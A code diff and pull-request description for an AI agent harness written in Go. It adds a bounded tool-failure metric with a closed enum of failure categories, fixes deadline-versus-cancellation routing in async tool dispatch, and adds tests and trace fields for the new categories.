+	// the cancellation path, not the resolution path.
+	deadline := time.Now().Add(-1 * time.Millisecond)
+	ctx, cancel := context.WithDeadline(context.Background(), deadline)
+	defer cancel()
+	_, _, outcome := loop.planAndDispatch(
+		ctx, cfg,
+		[]types.ToolCall{{ID: "tc_deadline", Name: "async_echo", Input: json.RawMessage(`{}`)}},
+		&stallDetector{},
+		"anthropic", "claude-sonnet-4-6",
+	)
+	if outcome != "" {
+		t.Fatalf("unexpected stall outcome %q", outcome)
+	}
+	failures := collectFailures(t, reader)
+	var timeoutHits, cancelledHits int64
+	for _, fp := range failures {
+		switch fp.category {
+		case observability.ToolFailureAsyncTimeout.String():
+			timeoutHits += fp.value
+		case observability.ToolFailureAsyncCancelled.String():
+			cancelledHits += fp.value
+		}
+	}
+	if timeoutHits != 1 {
+		t.Errorf("async_timeout count = %d, want exactly 1; full failures = %+v", timeoutHits, failures)
+	}
+	if cancelledHits != 0 {
+		t.Errorf("async_cancelled count = %d, want 0 (deadline must NOT route to cancelled); full failures = %+v", cancelledHits, failures)
 	}
 }

--- a/harness/internal/core/types.go
+++ b/harness/internal/core/types.go
@@ -392,7 +392,20 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		if strings.Contains(err.Error(), "emit failed") {
 			return fmt.Sprintf("async tool %s transport_disconnect: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncTransport
 		}
-		if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+		// Deadline expiry MUST be checked before cancellation. Both the
+		// correlator's per-call timeout and a run-level deadline on ctx
+		// surface as context.DeadlineExceeded wrapped by %w; the
+		// previous combined branch mis-routed every deadline-expired
+		// run to async_cancelled, polluting any alert keyed on
+		// async_cancelled spikes (which signal user cancellation, not
+		// timeout). errors.Is(DeadlineExceeded) and errors.Is(Canceled)
+		// can both return true for some wrapper chains, so order
+		// matters: timeout-first preserves the operator-meaningful
+		// distinction.
+		if errors.Is(err, context.DeadlineExceeded) {
+			return fmt.Sprintf("async tool %s timeout: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncTimeout
+		}
+		if errors.Is(err, context.Canceled) {
 			return fmt.Sprintf("async tool %s cancelled: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncCancelled
 		}
 		// Default: timeout (correlator: "timed out after ...") and any

--- a/harness/internal/core/types.go
+++ b/harness/internal/core/types.go
@@ -221,10 +221,27 @@ func (l *AgenticLoop) metricAttrs(extra ...attribute.KeyValue) metric.Measuremen
 // dispatchToolCall executes a single tool call, checking permissions and
 // validating input against the tool's JSON Schema. Returns the tool result
 // string and whether it succeeded.
+//
+// Preserved as a (string, bool) wrapper around dispatchToolCallCategorized
+// so existing test sites that take a two-value return continue to compile.
+// Production call sites in planAndDispatch use the categorised variant
+// directly so the per-failure category flows into the
+// stirrup.harness.tool_failures metric and the ToolCallTrace ErrorCategory
+// field.
 func (l *AgenticLoop) dispatchToolCall(ctx context.Context, call types.ToolCall) (string, bool) {
+	out, ok, _ := l.dispatchToolCallCategorized(ctx, call)
+	return out, ok
+}
+
+// dispatchToolCallCategorized is the production entry point. The third
+// return value is the bounded failure category for failed calls; on
+// success the category is empty. Every failure path in this function and
+// its async helper must assign a ToolFailureCategory drawn from the enum
+// in harness/internal/observability/toolfailure.go.
+func (l *AgenticLoop) dispatchToolCallCategorized(ctx context.Context, call types.ToolCall) (string, bool, observability.ToolFailureCategory) {
 	t := l.Tools.Resolve(call.Name)
 	if t == nil {
-		return "Unknown tool: " + call.Name, false
+		return "Unknown tool: " + call.Name, false, observability.ToolFailureUnknownTool
 	}
 
 	// Strip prototype-pollution keys before validation so we can both notify
@@ -246,14 +263,14 @@ func (l *AgenticLoop) dispatchToolCall(ctx context.Context, call types.ToolCall)
 		if l.Security != nil {
 			l.Security.ToolInputRejected(call.Name, []string{err.Error()})
 		}
-		return fmt.Sprintf("Invalid input for %s: %v", call.Name, err), false
+		return fmt.Sprintf("Invalid input for %s: %v", call.Name, err), false, observability.ToolFailureSchemaValidation
 	}
 
 	if findings := security.GuardToolCall(call.Name, t.WorkspaceMutating, call.Input); len(findings) > 0 {
 		if l.Security != nil {
 			l.Security.ToolCallGuardTriggered(call.Name, findings)
 		}
-		return fmt.Sprintf("Tool call rejected by security guard for %s", call.Name), false
+		return fmt.Sprintf("Tool call rejected by security guard for %s", call.Name), false, observability.ToolFailureSecurityGuard
 	}
 
 	// Check permissions for tools that mutate the workspace or that
@@ -271,7 +288,7 @@ func (l *AgenticLoop) dispatchToolCall(ctx context.Context, call types.ToolCall)
 			permSpan.RecordError(err)
 			permSpan.SetStatus(codes.Error, err.Error())
 			permSpan.End()
-			return "Permission check error: " + err.Error(), false
+			return "Permission check error: " + err.Error(), false, observability.ToolFailurePermissionError
 		}
 		permSpan.SetAttributes(attribute.Bool("permission.allowed", result.Allowed))
 		permSpan.End()
@@ -282,7 +299,7 @@ func (l *AgenticLoop) dispatchToolCall(ctx context.Context, call types.ToolCall)
 			if l.Trace != nil {
 				l.Trace.RecordPermissionDenial()
 			}
-			return "Permission denied: " + result.Reason, false
+			return "Permission denied: " + result.Reason, false, observability.ToolFailurePermissionDenied
 		}
 	}
 
@@ -299,13 +316,13 @@ func (l *AgenticLoop) dispatchToolCall(ctx context.Context, call types.ToolCall)
 	// Execute the tool handler with the cleaned input so the handler does not
 	// see prototype-pollution keys either.
 	if t.Handler == nil {
-		return fmt.Sprintf("Tool %s has no handler registered", call.Name), false
+		return fmt.Sprintf("Tool %s has no handler registered", call.Name), false, observability.ToolFailureHandlerMissing
 	}
 	output, err := t.Handler(ctx, inputForCall)
 	if err != nil {
-		return "Tool error: " + err.Error(), false
+		return "Tool error: " + err.Error(), false, observability.ToolFailureHandlerError
 	}
-	return output, true
+	return output, true, ""
 }
 
 // dispatchAsyncToolCall runs the async tool path:
@@ -329,7 +346,7 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 	t *tool.Tool,
 	call types.ToolCall,
 	inputForCall json.RawMessage,
-) (string, bool) {
+) (string, bool, observability.ToolFailureCategory) {
 	correlator := l.ensureAsyncCorrelator()
 	if correlator == nil {
 		// NullTransport (sub-agent) — no control plane to round-trip
@@ -337,12 +354,12 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		return fmt.Sprintf(
 			"async tool %s unavailable: this loop has no live control-plane transport",
 			call.Name,
-		), false
+		), false, observability.ToolFailureAsyncTransport
 	}
 
 	dispatch, err := t.AsyncHandler(ctx, inputForCall)
 	if err != nil {
-		return fmt.Sprintf("async tool %s internal error: %s", call.Name, err.Error()), false
+		return fmt.Sprintf("async tool %s internal error: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncPreflight
 	}
 
 	timeout := dispatch.Timeout
@@ -373,14 +390,14 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		// with "timed out", and ctx errors carry context.Canceled /
 		// context.DeadlineExceeded in the chain.
 		if strings.Contains(err.Error(), "emit failed") {
-			return fmt.Sprintf("async tool %s transport_disconnect: %s", call.Name, err.Error()), false
+			return fmt.Sprintf("async tool %s transport_disconnect: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncTransport
 		}
 		if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
-			return fmt.Sprintf("async tool %s cancelled: %s", call.Name, err.Error()), false
+			return fmt.Sprintf("async tool %s cancelled: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncCancelled
 		}
 		// Default: timeout (correlator: "timed out after ...") and any
 		// other unexpected wrapping go here.
-		return fmt.Sprintf("async tool %s timeout: %s", call.Name, err.Error()), false
+		return fmt.Sprintf("async tool %s timeout: %s", call.Name, err.Error()), false, observability.ToolFailureAsyncTimeout
 	}
 
 	resp, ok := payload.(asyncToolResult)
@@ -388,7 +405,7 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		// Defensive: extractAsyncToolResult only ever delivers
 		// asyncToolResult, so reaching this branch means the correlator
 		// was wired with a different extractor. Treat as a hard error.
-		return fmt.Sprintf("async tool %s internal error: unexpected payload type %T", call.Name, payload), false
+		return fmt.Sprintf("async tool %s internal error: unexpected payload type %T", call.Name, payload), false, observability.ToolFailureAsyncInternal
 	}
 	if resp.isError {
 		// The control plane is partially trusted: a compromised or
@@ -402,9 +419,9 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		// timeout, internal error) so the model can disambiguate
 		// upstream failures from harness-side failures.
 		scrubbed := security.Scrub(resp.content)
-		return fmt.Sprintf("async tool %s upstream_error: %s", call.Name, scrubbed), false
+		return fmt.Sprintf("async tool %s upstream_error: %s", call.Name, scrubbed), false, observability.ToolFailureAsyncUpstreamError
 	}
-	return resp.content, true
+	return resp.content, true, ""
 }
 
 // buildMessages constructs the initial message list from the user prompt.

--- a/harness/internal/core/types.go
+++ b/harness/internal/core/types.go
@@ -418,6 +418,13 @@ func (l *AgenticLoop) dispatchAsyncToolCall(
 		// Defensive: extractAsyncToolResult only ever delivers
 		// asyncToolResult, so reaching this branch means the correlator
 		// was wired with a different extractor. Treat as a hard error.
+		//
+		// TODO(#229-followup): no dispatch-site test covers this
+		// emission because the production wiring exposes no seam to
+		// inject a non-asyncToolResult payload — ensureAsyncCorrelator
+		// always attaches extractAsyncToolResult. Gap deferred per
+		// the wave-1-issue-229 synthesis brief; revisit if a future
+		// refactor exposes a way to swap the extractor for tests.
 		return fmt.Sprintf("async tool %s internal error: unexpected payload type %T", call.Name, payload), false, observability.ToolFailureAsyncInternal
 	}
 	if resp.isError {

--- a/harness/internal/observability/metrics.go
+++ b/harness/internal/observability/metrics.go
@@ -28,6 +28,7 @@ type Metrics struct {
 	TokensOutput          metric.Int64Counter
 	ToolCalls             metric.Int64Counter
 	ToolErrors            metric.Int64Counter
+	ToolFailures          metric.Int64Counter
 	ProviderRequests      metric.Int64Counter
 	ProviderErrors        metric.Int64Counter
 	ProviderRetryOutcomes metric.Int64Counter
@@ -282,6 +283,25 @@ func newMetricsFromMeter(meter metric.Meter, provider *sdkmetric.MeterProvider) 
 	m.ToolErrors, err = meter.Int64Counter("stirrup.harness.tool_errors",
 		metric.WithUnit("{call}"),
 		metric.WithDescription("Total tool calls that failed"),
+	)
+	if err != nil {
+		return nil, err
+	}
+
+	// ToolFailures decomposes ToolErrors by normalised failure category
+	// and labels each observation with provider.type, provider.model,
+	// tool.name, run.mode, and category. The category attribute is
+	// drawn from the closed ToolFailureCategory enum (see
+	// toolfailure.go) so series cardinality is bounded regardless of
+	// adversary-influenceable inputs. Includes turn-level provider
+	// failures attributable to the tool-use pipeline (request
+	// rejection, mid-stream parser errors with tools attached) and
+	// stall-detector terminations triggered by tool failure patterns,
+	// in addition to the dispatch-site failures already counted by
+	// ToolErrors.
+	m.ToolFailures, err = meter.Int64Counter("stirrup.harness.tool_failures",
+		metric.WithUnit("{failure}"),
+		metric.WithDescription("Tool-use failures decomposed by provider, model, tool, and bounded failure category"),
 	)
 	if err != nil {
 		return nil, err

--- a/harness/internal/observability/toolfailure.go
+++ b/harness/internal/observability/toolfailure.go
@@ -1,0 +1,153 @@
+package observability
+
+// ToolFailureCategory is a bounded enum of normalised tool-use failure
+// reasons. Every value in this file MUST correspond to a concrete failure
+// site in the harness (dispatch, provider adapter, stall detector) — the
+// metric `stirrup.harness.tool_failures` labels series by category, and
+// inventing a value with no producer would create an empty timeseries that
+// confuses dashboards.
+//
+// Cardinality is bounded by design: this is a closed enum, the tool name
+// is the internal canonical name from tool.Tool.Name, and provider/model
+// come from the router's ModelSelection. Free-form error strings live in
+// scrubbed trace records (ToolCallTrace.ErrorReason) and never become
+// metric labels.
+type ToolFailureCategory string
+
+const (
+	// ToolFailureUnknownTool — model emitted a tool_use block whose
+	// Name does not resolve via tool.Registry.Resolve. Fires from
+	// dispatchToolCall.
+	ToolFailureUnknownTool ToolFailureCategory = "unknown_tool"
+
+	// ToolFailureSchemaValidation — security.ValidateJSONSchema rejected
+	// the model's input against the tool's published InputSchema. Fires
+	// from dispatchToolCall after prototype-pollution stripping.
+	ToolFailureSchemaValidation ToolFailureCategory = "schema_validation_failed"
+
+	// ToolFailureSecurityGuard — security.GuardToolCall returned
+	// findings (e.g. write-tool denylist hit). Fires from
+	// dispatchToolCall before permission check.
+	ToolFailureSecurityGuard ToolFailureCategory = "security_guard_denied"
+
+	// ToolFailurePermissionDenied — permission.PermissionPolicy.Check
+	// returned Allowed=false for a workspace-mutating / approval-
+	// requiring tool. Fires from dispatchToolCall.
+	ToolFailurePermissionDenied ToolFailureCategory = "permission_denied"
+
+	// ToolFailurePermissionError — Permission.Check itself errored
+	// (e.g. upstream ask transport disconnected). Distinct from
+	// PermissionDenied because it represents a control-plane fault,
+	// not an allow/deny decision.
+	ToolFailurePermissionError ToolFailureCategory = "permission_error"
+
+	// ToolFailureGuardrailDenied — PhasePreTool GuardRail returned
+	// VerdictDeny (or fail-closed error). Fires from planAndDispatch's
+	// pre-dispatch guard check.
+	ToolFailureGuardrailDenied ToolFailureCategory = "guardrail_denied"
+
+	// ToolFailureHandlerError — the sync tool Handler returned a
+	// non-nil error. Fires from dispatchToolCall.
+	ToolFailureHandlerError ToolFailureCategory = "handler_error"
+
+	// ToolFailureHandlerMissing — the resolved tool has neither a sync
+	// Handler nor an AsyncHandler. Defensive; indicates a registry
+	// misconfiguration rather than a model-side failure.
+	ToolFailureHandlerMissing ToolFailureCategory = "handler_missing"
+
+	// ToolFailureAsyncPreflight — the AsyncHandler preflight returned
+	// an error before the loop emitted tool_result_request. Fires from
+	// dispatchAsyncToolCall.
+	ToolFailureAsyncPreflight ToolFailureCategory = "async_preflight_error"
+
+	// ToolFailureAsyncTransport — async tool dispatch attempted on a
+	// loop with no control-plane transport, or the correlator's emit
+	// raised a transport_disconnect.
+	ToolFailureAsyncTransport ToolFailureCategory = "async_transport_unavailable"
+
+	// ToolFailureAsyncTimeout — the per-call timeout (default 60s,
+	// AsyncDispatch.Timeout override) fired before a matching
+	// tool_result_response arrived.
+	ToolFailureAsyncTimeout ToolFailureCategory = "async_timeout"
+
+	// ToolFailureAsyncCancelled — the run context was cancelled while
+	// the dispatch was blocked on the correlator.
+	ToolFailureAsyncCancelled ToolFailureCategory = "async_cancelled"
+
+	// ToolFailureAsyncUpstreamError — the control plane delivered a
+	// tool_result_response with IsError=true.
+	ToolFailureAsyncUpstreamError ToolFailureCategory = "async_upstream_error"
+
+	// ToolFailureAsyncPanic — an async handler goroutine panicked and
+	// was recovered by the dispatch fan-out.
+	ToolFailureAsyncPanic ToolFailureCategory = "async_panic"
+
+	// ToolFailureAsyncInternal — defensive: extractAsyncToolResult
+	// delivered a payload of an unexpected type. Should not occur in
+	// practice; presence on a dashboard indicates a wiring regression.
+	ToolFailureAsyncInternal ToolFailureCategory = "async_internal_error"
+
+	// ToolFailureProviderRequest — provider.Stream returned an error
+	// before producing the first stream event, while tool definitions
+	// were attached to the request. Includes serialization rejections
+	// and HTTP-level rejections (4xx) of tool-bearing requests. Fires
+	// from runInnerLoop.
+	ToolFailureProviderRequest ToolFailureCategory = "provider_request_failed"
+
+	// ToolFailureProviderStream — provider stream errored mid-flight
+	// after the request opened, on a turn that had tool definitions
+	// attached. Captures stream parser errors and SSE-side abrupt
+	// terminations during tool-call assembly. Fires from runInnerLoop.
+	ToolFailureProviderStream ToolFailureCategory = "provider_stream_failed"
+
+	// ToolFailureStallRepeated — stall detector observed
+	// maxRepeatedToolCalls identical consecutive (name, input) calls.
+	// Fires from planAndDispatch when stall.recordToolCall returns
+	// "stalled".
+	ToolFailureStallRepeated ToolFailureCategory = "stall_repeated_calls"
+
+	// ToolFailureStallConsecutiveFailures — stall detector observed
+	// maxConsecutiveFailures consecutive failed calls. Fires from
+	// planAndDispatch when stall.recordToolCall returns "tool_failures".
+	ToolFailureStallConsecutiveFailures ToolFailureCategory = "stall_consecutive_failures"
+)
+
+// allToolFailureCategories is the closed set of valid category values.
+// Used by IsValid (and tests asserting the cardinality bound) to confirm
+// metric labels are drawn from the enum rather than a free-form string.
+var allToolFailureCategories = map[ToolFailureCategory]struct{}{
+	ToolFailureUnknownTool:              {},
+	ToolFailureSchemaValidation:         {},
+	ToolFailureSecurityGuard:            {},
+	ToolFailurePermissionDenied:         {},
+	ToolFailurePermissionError:          {},
+	ToolFailureGuardrailDenied:          {},
+	ToolFailureHandlerError:             {},
+	ToolFailureHandlerMissing:           {},
+	ToolFailureAsyncPreflight:           {},
+	ToolFailureAsyncTransport:           {},
+	ToolFailureAsyncTimeout:             {},
+	ToolFailureAsyncCancelled:           {},
+	ToolFailureAsyncUpstreamError:       {},
+	ToolFailureAsyncPanic:               {},
+	ToolFailureAsyncInternal:            {},
+	ToolFailureProviderRequest:          {},
+	ToolFailureProviderStream:           {},
+	ToolFailureStallRepeated:            {},
+	ToolFailureStallConsecutiveFailures: {},
+}
+
+// IsValid reports whether c is a recognised tool failure category. Used by
+// the metric emission site to refuse free-form values at the boundary; an
+// unknown category indicates a producer mistake and would silently widen
+// label cardinality otherwise.
+func (c ToolFailureCategory) IsValid() bool {
+	_, ok := allToolFailureCategories[c]
+	return ok
+}
+
+// String returns the category's canonical wire string. Included for
+// completeness — most callers will use the typed constant directly.
+func (c ToolFailureCategory) String() string {
+	return string(c)
+}

--- a/harness/internal/observability/toolfailure_test.go
+++ b/harness/internal/observability/toolfailure_test.go
@@ -1,0 +1,82 @@
+package observability
+
+import "testing"
+
+// TestToolFailureCategory_KnownValuesAreValid pins the closed-enum
+// invariant: every exported ToolFailure* constant must be present in
+// allToolFailureCategories. A new constant added without registering
+// it would silently IsValid()=false at runtime and metric emission
+// sites that gate on IsValid would drop the observation.
+//
+// The list mirrors the categories declared in toolfailure.go. If a
+// new constant is added, this list and the map both need updates;
+// missing either ends with a failing test, which is the goal.
+func TestToolFailureCategory_KnownValuesAreValid(t *testing.T) {
+	known := []ToolFailureCategory{
+		ToolFailureUnknownTool,
+		ToolFailureSchemaValidation,
+		ToolFailureSecurityGuard,
+		ToolFailurePermissionDenied,
+		ToolFailurePermissionError,
+		ToolFailureGuardrailDenied,
+		ToolFailureHandlerError,
+		ToolFailureHandlerMissing,
+		ToolFailureAsyncPreflight,
+		ToolFailureAsyncTransport,
+		ToolFailureAsyncTimeout,
+		ToolFailureAsyncCancelled,
+		ToolFailureAsyncUpstreamError,
+		ToolFailureAsyncPanic,
+		ToolFailureAsyncInternal,
+		ToolFailureProviderRequest,
+		ToolFailureProviderStream,
+		ToolFailureStallRepeated,
+		ToolFailureStallConsecutiveFailures,
+	}
+	for _, c := range known {
+		if !c.IsValid() {
+			t.Errorf("category %q not registered in allToolFailureCategories", c)
+		}
+		if c.String() == "" {
+			t.Errorf("category %v has empty wire string", c)
+		}
+	}
+	// Cross-check: every entry in the registry maps to one of the
+	// known constants. A typo in the map (e.g. duplicated key or
+	// orphaned entry) would surface here without needing per-key
+	// assertions.
+	if len(allToolFailureCategories) != len(known) {
+		t.Errorf("registry size = %d, known constants = %d (entries diverge)",
+			len(allToolFailureCategories), len(known))
+	}
+}
+
+// TestToolFailureCategory_BogusValuesRejected pins the other half of
+// the bound: any value not in the registry must IsValid()=false.
+// Metric emission sites should reject these so free-form strings
+// cannot widen the cardinality of the tool_failures series.
+func TestToolFailureCategory_BogusValuesRejected(t *testing.T) {
+	for _, s := range []string{
+		"",
+		"UNKNOWN_TOOL",
+		"permission denied",
+		"PermissionDenied",
+		"handler_err",
+		"unknown_tool ",
+		"\x00",
+	} {
+		if ToolFailureCategory(s).IsValid() {
+			t.Errorf("bogus value %q must not validate", s)
+		}
+	}
+}
+
+// TestToolFailureCategory_StringRoundTrip confirms String() returns
+// the underlying wire form unchanged so reflective consumers (tests,
+// dashboards) read the same value they would see on the OTLP wire.
+func TestToolFailureCategory_StringRoundTrip(t *testing.T) {
+	c := ToolFailureHandlerError
+	if got := c.String(); got != "handler_error" {
+		t.Errorf("String() = %q, want handler_error", got)
+	}
+}

--- a/types/runtrace.go
+++ b/types/runtrace.go
@@ -48,6 +48,12 @@ type ToolCallSummary struct {
 	// ParentRunID is the run ID of the sub-agent's parent. Populated only
 	// for forwarded sub-agent events.
 	ParentRunID string `json:"parentRunId,omitempty"`
+	// ErrorCategory is the normalised failure category for failed calls.
+	// Always empty on Success=true; one of the
+	// observability.ToolFailureCategory enum values otherwise. Kept here
+	// so the JSONL trace files carry the same taxonomy that the
+	// stirrup.harness.tool_failures metric labels.
+	ErrorCategory string `json:"errorCategory,omitempty"`
 }
 
 // VerificationResult holds the outcome of a verification check.
@@ -117,6 +123,12 @@ type ToolCallTrace struct {
 	// ParentRunID is the run ID of the sub-agent's parent. Populated only
 	// for forwarded sub-agent events.
 	ParentRunID string `json:"parentRunId,omitempty"`
+	// ErrorCategory is the normalised failure category for failed calls.
+	// Always empty on Success=true; one of the
+	// observability.ToolFailureCategory enum values otherwise. Kept here
+	// so the JSONL trace files carry the same taxonomy that the
+	// stirrup.harness.tool_failures metric labels.
+	ErrorCategory string `json:"errorCategory,omitempty"`
 }
 
 // TurnRecord captures the full input/output of a single agentic loop turn.


### PR DESCRIPTION
Closes #229.

Adds a new OTel `Int64Counter` `stirrup.harness.tool_failures` labelled by `(tool.name, category, provider.type, provider.model, run.mode)`. The `category` dimension is a closed 19-value enum (`ToolFailureCategory`) in `harness/internal/observability/toolfailure.go`, guarded by `IsValid()` before every emission to prevent free-form strings widening label cardinality.

## Emission sites
- `dispatch.go` (Phase 3): all per-call dispatch failures — `unknown_tool`, `schema_validation_failed`, `security_guard_denied`, `permission_denied`, `permission_error`, `guardrail_denied`, `handler_error`, `handler_missing`.
- `dispatch.go` (stall block): stall-detector termination co-emission — `stall_consecutive_failures`, `stall_repeated_calls`.
- `types.go` (async path): `async_preflight_error`, `async_transport_unavailable`, `async_timeout`, `async_cancelled`, `async_upstream_error`, `async_panic`, `async_internal_error`.
- `loop.go`: `provider_request_failed`, `provider_stream_failed` (tool-bearing turns only).

The `ErrorCategory` field is co-emitted to `ToolCallTrace` / `ToolCallSummary` so JSONL / GCS / OTel trace records carry the same taxonomy. `ErrorCategory` is `json:",omitempty"` so existing trace consumers are unaffected.

## Pre-merge remediation
- **Deadline vs cancellation**: `context.DeadlineExceeded` previously routed to `async_cancelled`; now correctly routes to `async_timeout` via an ordered two-branch `errors.Is` check at `types.go:395`. Pinned by `TestToolFailureMetrics_AsyncDeadlineRoutesToTimeout`, which explicitly asserts `async_timeout` is emitted AND `async_cancelled` is NOT.
- **Cardinality DoS on unknown tool**: model-supplied `call.Name` is replaced with the sentinel `"__unknown__"` at the metric label boundary when `p.failureCategory == ToolFailureUnknownTool` (dispatch.go and the stall co-emission path). The raw model-supplied name is retained in the trace record for forensic visibility.
- **Emission test coverage**: added table rows for `security_guard_denied` and `handler_missing`; added named tests for `stall_repeated_calls`, `async_timeout`, `async_cancelled`, `async_upstream_error`, `async_panic`. `async_internal_error` is accepted as untestable without an internal seam — `TODO(#229-followup)` filed at `types.go:425`.

## Verification
- `just` (build + full test suite) exits 0; `just lint` clean.
- Regression test confirmed: `TestToolFailureMetrics_AsyncDeadlineRoutesToTimeout` fails on the pre-patch code (`async_cancelled=1, async_timeout=0`) and passes after the deadline-first split.

## Deferred (follow-up issues — `TODO(#229-followup)` markers in code)
- OTel span name `"tool." + call.Name` at `dispatch.go:97` carries unbounded model-controlled string before tool resolution; same threat model as the metric label.
- `async_internal_error` test gap (`types.go:425`).
- `provider.model` label has no length/character-class bound for non-Gemini providers (operator-controlled, low blast radius).
- Metric description prose: should document the `tool.name = ""` provider-scope sentinel and the stall co-emission double-counting behaviour.
- Reserve `ToolFailureNoToolWhenRequired = "no_tool_when_required"` in the enum before Wave 4 #230 wires it.
- `trace_show.go::toolStatus` does not render `ErrorCategory`; Wave 5 follow-up.

Reviewed by code, security, spec-compliance, test-coverage, and api-design reviewers; remediation brief in workstream scratch. Verdict: NEEDS REMEDIATION (applied).